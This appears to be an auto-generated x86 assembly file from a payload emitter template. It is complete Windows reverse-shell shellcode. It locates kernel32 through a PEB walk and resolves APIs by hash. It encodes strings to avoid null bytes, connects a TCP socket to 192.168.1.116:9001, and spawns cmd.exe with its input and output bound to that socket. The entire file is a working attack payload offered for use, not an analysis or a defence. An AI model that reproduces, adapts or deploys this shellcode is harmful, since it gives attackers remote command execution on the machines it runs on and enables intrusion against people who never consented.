; AUTO-GENERATED by emitter-v1
; Manifest: Tools/emitter/manifests/revshell.yaml
; Template: ReverseShellTemplate
; Generated: 2026-06-15 13:42:40

    _start:
        jmp main

; ── Framework Stubs ────────────────────────────────────────────────

find_module:
    call get_first_ldr_entry
    jmp find_kernel32_entry

get_first_ldr_entry:
    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]
    mov eax, [eax + 0x0c]
    mov eax, [eax + 0x1c]
    sub eax, 0x10
    ret

find_kernel32_entry:
    mov esi, [eax + 0x30]
    cmp word ptr [esi], 0x004b
    jne next
    cmp word ptr [esi+2], 0x0045
    jne next
    cmp word ptr [esi+12], 0x0033
    jne next
    mov ebx, [eax + 0x18]
    ret

next:
    mov eax, [eax + 0x10]
    sub eax, 0x10
    jmp find_kernel32_entry

get_export_directory:
    mov eax, [ebx+0x3c]
    add eax, ebx
    mov eax, [eax+0x78]
    add eax, ebx
    ret

get_export_tables:
    mov ecx, [eax+0x18]
    mov edi, [eax+0x20]
    add edi, ebx
    mov edx, [eax+0x24]
    add edx, ebx
    mov esi, [eax+0x1c]
    add esi, ebx
    ret

save_export_context:
    mov [ebp-0x04], ebx
    mov [ebp-0x08], edi
    mov [ebp-0x0c], edx
    mov [ebp-0x10], esi
    mov [ebp-0x14], ecx
    ret

resolve_export_by_hash:
    mov [ebp-0x18], eax
    xor ecx, ecx

find_export_loop:
    mov edi, [ebp - 0x08]
    mov eax, [edi + ecx*4]
    add eax, [ebp - 0x04]
    mov esi, eax
    call compute_hash
    cmp edx, [ebp-0x18]
    je resolve_matched_export

inc_next:
    inc ecx
    cmp ecx, [ebp - 0x14]
    jl find_export_loop

compute_hash:
    xor eax, eax
    xor edx, edx
    cld

hash_loop:
    lodsb
    test al, al
    jz hash_done
    ror edx, 0x0d
    movzx eax, al
    add edx, eax
    jmp hash_loop

hash_done:
    ret

resolve_matched_export:
    mov edx, [ebp - 0x0c]
    movzx eax, word ptr [edx + ecx*2]
    mov esi, [ebp - 0x10]
    mov eax, [esi + eax*4]
    add eax, [ebp - 0x04]
    ret

; ── Main ───────────────────────────────────────────────────────────

main:
    mov  ebp, esp
    add  esp, 0xfffffb00

    ; Bootstrap: find kernel32 via PEB walk
    call find_module
    call get_export_directory
    call get_export_tables
    call save_export_context

; ── kernel32.dll (peb) ────────────────────────────────────────────

    ; CreateProcessA  [ebp-0x28]
    mov  eax, 0x16b3fe72
    call resolve_export_by_hash
    mov  [ebp-0x28], eax

    ; LoadLibraryA  [ebp-0x2c]
    mov  eax, 0xec0e4e8e
    call resolve_export_by_hash
    mov  [ebp-0x2c], eax

    ; GetProcAddress  [ebp-0x30]
    mov  eax, 0x7c0dfcaa
    call resolve_export_by_hash
    mov  [ebp-0x30], eax

    ; ExitProcess  [ebp-0x34]
    mov  eax, 0x73e2d87e
    call resolve_export_by_hash
    mov  [ebp-0x34], eax

    ; WinExec  [ebp-0x38]
    mov  eax, 0x0e8afe98
    call resolve_export_by_hash
    mov  [ebp-0x38], eax

; ── Loading ws2_32.dll via LoadLibraryA ──────────────────────────────────

; emit_push: "ws2_32.dll" (null-safe)
; ESP = pointer to "ws2_32.dll\0" after pushes

    push 0x01016d6d
    xor  dword [esp], 0x01010101
    push 0x642e3233
    push 0x5f327377
    mov  esi, esp        ; ESI = "ws2_32.dll"
    push esi                    ; lpLibFileName = &ws2_32.dll
    call dword ptr [ebp-0x2c]
    mov  [ebp-0x24], eax    ; ws2_32.dll base
    add  esp, 0x0c           ; pop string from stack

    mov  ebx, [ebp-0x24]
    call get_export_directory
    call get_export_tables
    call save_export_context

; ── ws2_32.dll (LoadLibraryA) ─────────────────────────────────────

    ; WSAStartup  [ebp-0x3c]
    mov  eax, 0x3bfcedcb
    call resolve_export_by_hash
    mov  [ebp-0x3c], eax

    ; WSASocketA  [ebp-0x40]
    mov  eax, 0xadf509d9
    call resolve_export_by_hash
    mov  [ebp-0x40], eax

    ; connect  [ebp-0x44]
    mov  eax, 0x60aaf9ec
    call resolve_export_by_hash
    mov  [ebp-0x44], eax

; ── String Construction ─────────────────────────────────────────────

; --- cmd: "cmd.exe" (mov) ---
    lea  edi, [ebp-0x274]
; emit_mov: "cmd.exe" (null-safe)
; 8 bytes written to [edi]

    mov  eax, 0x2e646d63
    mov  [edi], eax
    mov  eax, 0x01647964
    xor  eax, 0x01010101  ; decode → 0x00657865
    mov  [edi+0x4], eax

; ── Structure Initialization ────────────────────────────────────────

; --- STARTUPINFOA at [ebp-0x80] (0x44 bytes) ---

    xor  eax, eax
    lea  edi, [ebp-0x80]

    ; zero 0x44 bytes (17 DWORDs)
    mov  ecx, 17
startupinfoa_zero_loop:
    mov  [edi], eax
    add  edi, 4
    loop startupinfoa_zero_loop

    lea  edi, [ebp-0x80]
    mov  byte ptr [edi], 0x44      ; cb = sizeof(STARTUPINFOA)

    mov  eax, 1
    rol  eax, 8                    ; eax = 0x100
    mov  [edi+0x2c], eax           ; dwFlags = STARTF_USESTDHANDLES

    ; hStdInput/hStdOutput/hStdError set by payload after socket creation

; --- PROCESS_INFORMATION at [ebp-0xc4] (0x10 bytes) ---

    xor  eax, eax
    lea  edi, [ebp-0xc4]
    mov  [edi+0x00], eax
    mov  [edi+0x04], eax
    mov  [edi+0x08], eax
    mov  [edi+0x0c], eax

; --- WSADATA at [ebp-0xd4] (0x190 bytes) ---
; No initialization needed — WSAStartup writes output to [ebp-0xd4].

; --- sockaddr_in at [ebp-0x264] (0x10 bytes) ---
; sin_port and sin_addr are set by the payload template.

    xor  eax, eax
    lea  edi, [ebp-0x264]
    mov  [edi+0x00], eax
    mov  [edi+0x04], eax
    mov  [edi+0x08], eax
    mov  [edi+0x0c], eax

    ; sin_family = AF_INET
    mov  word ptr [edi], 0x0002

    ; Template sets sin_port (+0x02) and sin_addr (+0x04) before connect()

; ── Payload ─────────────────────────────────────────────────────────

; ── Reverse Shell Payload ─────────────────────────────────────────
; Target: 192.168.1.116:9001

    ; WSAStartup(0x0202, &WSADATA)
    lea  esi, [ebp-0xd4]
    push esi                    ; lpWSAData
    push 0x0202                 ; wVersionRequested = MAKEWORD(2,2)
    call dword ptr [ebp-0x3c]

    ; WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)
    xor  eax, eax
    push eax                    ; dwFlags = NULL
    push eax                    ; g = NULL
    push eax                    ; lpProtocolInfo = NULL
    mov  al, 0x6
    push eax                    ; protocol = IPPROTO_TCP
    sub  al, 0x5
    push eax                    ; type = SOCK_STREAM
    inc  eax
    push eax                    ; af = AF_INET
    call dword ptr [ebp-0x40]
    mov  [ebp-0x48], eax         ; save SOCKET handle

    ; Set STARTUPINFOA stdio handles to socket
    mov  eax, [ebp-0x48]
    lea  edi, [ebp-0x80]
    mov  [edi+0x38], eax        ; hStdInput
    mov  [edi+0x3c], eax        ; hStdOutput
    mov  [edi+0x40], eax        ; hStdError

    ; Set sockaddr_in address and port
    lea  edi, [ebp-0x264]
    mov  word ptr [edi+0x02], 0x2923     ; sin_port (big-endian)
    mov  dword ptr [edi+0x04], 0xc0a80174  ; sin_addr (big-endian)

    ; connect(socket, &sockaddr_in, 0x10)
    lea  eax, [ebp-0x264]
    push 0x10                   ; namelen
    push eax                    ; name = &sockaddr_in
    push dword ptr [ebp-0x48]    ; socket handle
    call dword ptr [ebp-0x44]

    ; CreateProcessA(NULL, &cmd, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi)
    lea  esi, [ebp-0x274]
    lea  edi, [ebp-0x80]
    lea  ebx, [ebp-0xc4]
    xor  eax, eax
    push ebx                    ; lpProcessInformation
    push edi                    ; lpStartupInfo
    push eax                    ; lpCurrentDirectory = NULL
    push eax                    ; lpEnvironment = NULL
    push eax                    ; dwCreationFlags = NULL
    inc  eax
    push eax                    ; bInheritHandles = TRUE
    xor  eax, eax
    push eax                    ; lpThreadAttributes = NULL
    push eax                    ; lpProcessAttributes = NULL
    push esi                    ; lpCommandLine = &cmd
    push eax                    ; lpApplicationName = NULL
    call dword ptr [ebp-0x28]

hang:
    jmp hang
